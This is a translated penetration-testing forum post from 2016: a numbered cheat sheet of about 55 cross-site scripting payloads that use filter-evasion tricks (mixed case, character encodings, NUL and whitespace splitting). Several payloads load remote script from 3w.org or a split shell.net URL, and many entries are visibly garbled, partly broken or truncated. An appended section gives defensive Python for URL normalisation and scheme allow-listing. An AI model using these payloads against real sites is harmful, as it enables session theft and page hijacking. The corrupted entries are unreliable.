China Network Penetration Testing Alliance

Title: XSS Attack Roundup

Author: admin    Time: 2016-4-28 10:06
Title: XSS Attack Roundup
(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative popups

<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using JavaScript commands
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag without semicolons or quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Fixing a defective IMG tag

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)

<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)

<IMG SRC=jav..omitted..S')>

(10) Hexadecimal encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; this is an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters are basically ineffective domestically, because there is nowhere they can be exploited
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the IMG tag
<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute split expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous STYLE (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed Flash that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
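Items (3), (4), (5), (9), (11), (13), (14) and (17) above share one idea: a filter that searches the raw attribute value for the substring `javascript:` is beaten by mixed case, by an embedded NUL, tab, newline or carriage return, and by HTML character references, because the browser normalises all of those away before it interprets the URL. The defensive answer is to normalise first and then allow-list the scheme, rather than blacklist strings. The following Python is an added example written for this page, not code from the forum post or the original cheat sheet. `naive_blocks` stands in for the kind of substring filter the payloads target, `ALLOWED_SCHEMES` is an assumed site policy, and the `SAMPLES` list is constructed from the post's own tricks so the gap between the two checks is visible.

```python
import html
import re

# Added defensive example (not part of the forum post). A URL destined for an
# href/src attribute is normalised the way a browser effectively does, then its
# scheme is compared against an allow-list; finally the value is attribute-encoded.

# ASCII control characters and space: browsers drop these inside a URL scheme
# (NUL, TAB, LF, CR are the ones the post's payloads rely on).
_CONTROL_AND_SPACE = re.compile(r"[\x00-\x20\x7f]")
# RFC 3986 scheme syntax: a letter, then letters / digits / "+" / "-" / ".", then ":".
_SCHEME = re.compile(r"^([a-zA-Z][a-zA-Z0-9+.\-]*):")
# Assumed site policy: anything not listed (javascript:, vbscript:, data:, ...) is rejected.
ALLOWED_SCHEMES = frozenset({"http", "https", "mailto"})


def naive_blocks(value: str) -> bool:
    """The substring blacklist the post's encoding/whitespace/NUL tricks are built to evade."""
    return "javascript:" in value.lower()


def normalize_url(value: str) -> str:
    """Decode HTML character references, then strip control characters and whitespace."""
    decoded = html.unescape(value)  # handles &#106; &#x6A; and the no-semicolon forms
    return _CONTROL_AND_SPACE.sub("", decoded)


def is_safe_url(value: str) -> bool:
    """True for scheme-less (relative) URLs and for schemes on the allow-list; False otherwise."""
    normalized = normalize_url(value)
    match = _SCHEME.match(normalized)
    if match is None:
        return True  # no scheme, e.g. /images/logo.png
    return match.group(1).lower() in ALLOWED_SCHEMES


def render_img(src: str) -> str:
    """Build an <img> tag: reject unsafe schemes (empty src), then attribute-encode."""
    url = normalize_url(src) if is_safe_url(src) else ""
    return '<img src="%s">' % html.escape(url, quote=True)


# Constructed sample inputs modelled on items (3), (4), (5), (11), (13) and (17) of the post,
# plus two legitimate URLs that must keep working.
SAMPLES = [
    "javascript:alert('XSS')",
    "JaVaScRiPt:alert('XSS')",
    "java\x00script:alert(\"XSS\")",
    "jav\tascript:alert('XSS')",
    "jav\nascript:alert('XSS')",
    "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
    "http://example.com/logo.png",
    "/images/logo.png",
]


def evaluate(samples=SAMPLES):
    """Return (sample, blocked_by_naive_filter, blocked_by_allowlist) for each sample."""
    return [(s, naive_blocks(s), not is_safe_url(s)) for s in samples]


if __name__ == "__main__":
    for value, naive_blocked, allow_blocked in evaluate():
        print("%-42r naive_blocks=%-5s allowlist_blocks=%s" % (value[:40], naive_blocked, allow_blocked))
    print(render_img("JaVaScRiPt:alert('XSS')"))
    print(render_img("http://example.com/logo.png?a=1&b=2"))
```

Running it shows the substring filter catching only the first two samples while the allow-list check rejects all six hostile ones and passes the two legitimate URLs. Two design points: the scheme is decided on the normalised string but the attribute is also encoded on output, since scheme checking alone does nothing against a quote that closes the attribute; and a protocol-relative URL such as `//3w.org/XSS/xss.js` (item 25) has no scheme and is treated as relative here, so whether to allow off-site hosts is a separate policy decision.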

Welcome to China Network Penetration Testing Alliance (https://cobjon.com/) Powered by Discuz! X3.2